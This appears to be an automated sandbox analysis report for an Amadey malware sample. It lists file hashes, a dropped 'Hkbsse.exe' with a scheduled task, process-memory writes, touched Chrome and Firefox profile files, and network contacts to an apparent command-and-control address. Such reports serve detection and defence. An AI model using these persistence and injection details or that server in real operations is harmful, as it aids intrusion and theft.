| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
memory/2280-528-0x00000000039D0000-0x0000000003A5B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ty9peokp.default-release\prefs.js
| MD5 | 9da33508b28f2450b30fa00d1e3463c6 |
| SHA1 | 320f2f8dc3509dc770196c0d3172140f2cedb70e |
| SHA256 | 550d6bfbca4f87d2d8abab8a9183acfaa53340af4141a129a30dcd706da0344e |
| SHA512 | 2bfec3ddf66da00026f4b2a46dd31e778627efe5d368c7c28a65844b7a8b7c4cdbd16cc775e07268a64b558deb88cf2ec5feebfe43e3b8eb136585df1f5e2484 |
memory/2280-538-0x0000000003BC0000-0x0000000003C96000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3c1a4ed6266cf2855a5eb7ee979f8ee3 |
| SHA1 | 5b3b23dc5affa5c2100af0d5ea43c1d0ac6491a6 |
| SHA256 | b4d93c70c9b2972ef85edc2698608ca6e5ea19ac6d731c1cf28a30fab4d89291 |
| SHA512 | 44891aaa5f63b1b264e663665ddd41e650c01dc20bf7b7bad4bd8368b68ab699e5de3dc6ecc785d88f00ae576d2a5943b8692e693afe74b16d20d7d11b8f0271 |
memory/1508-565-0x0000000001330000-0x000000000191C000-memory.dmp
memory/2280-581-0x0000000000090000-0x000000000073F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 23:56
Reported
2024-06-21 00:01
Platform
win10-20240404-en
Max time kernel
296s
Max time network
260s
Command Line
Signatures
Amadey
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2820 wrote to memory of 4820 | N/A | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe |
| PID 2820 wrote to memory of 4820 | N/A | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe |
| PID 2820 wrote to memory of 4820 | N/A | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe
"C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe"
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
Network
| Country | Destination | Domain | Proto |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| US | 8.8.8.8:53 | 116.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
| MD5 | 993609639c915d36f2821bad869a17d4 |
| SHA1 | 899988523cc0bde90c28889a5e32b273757915ac |
| SHA256 | fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7 |
| SHA512 | 147b9272265b9a5edea8b1f54b37dd95e8380ba461233bb476612ff48016ae752b2cbfa31d3bf87a6f404469eae6c90392c652f19720b4531b78e648b7b58f32 |
C:\Users\Admin\AppData\Local\Temp\699363923187
| MD5 | d5c40ce55dfbd61df6f9207d3ad23897 |
| SHA1 | 914b4aa27feeaeba28061dd64019e76e2e001332 |
| SHA256 | a2920a7ef44f90d0d7bc4df6097bd1bfffda3b948f34619b270381aa6d322961 |
| SHA512 | c1a49696709d22f8dabfad025a78f21181156c8939758b806ff74ac4e8deea3a9829115b27ae616d941f2d15e3839cbe14cdc5fa2e7ef9a9b862e087d1d11dbb |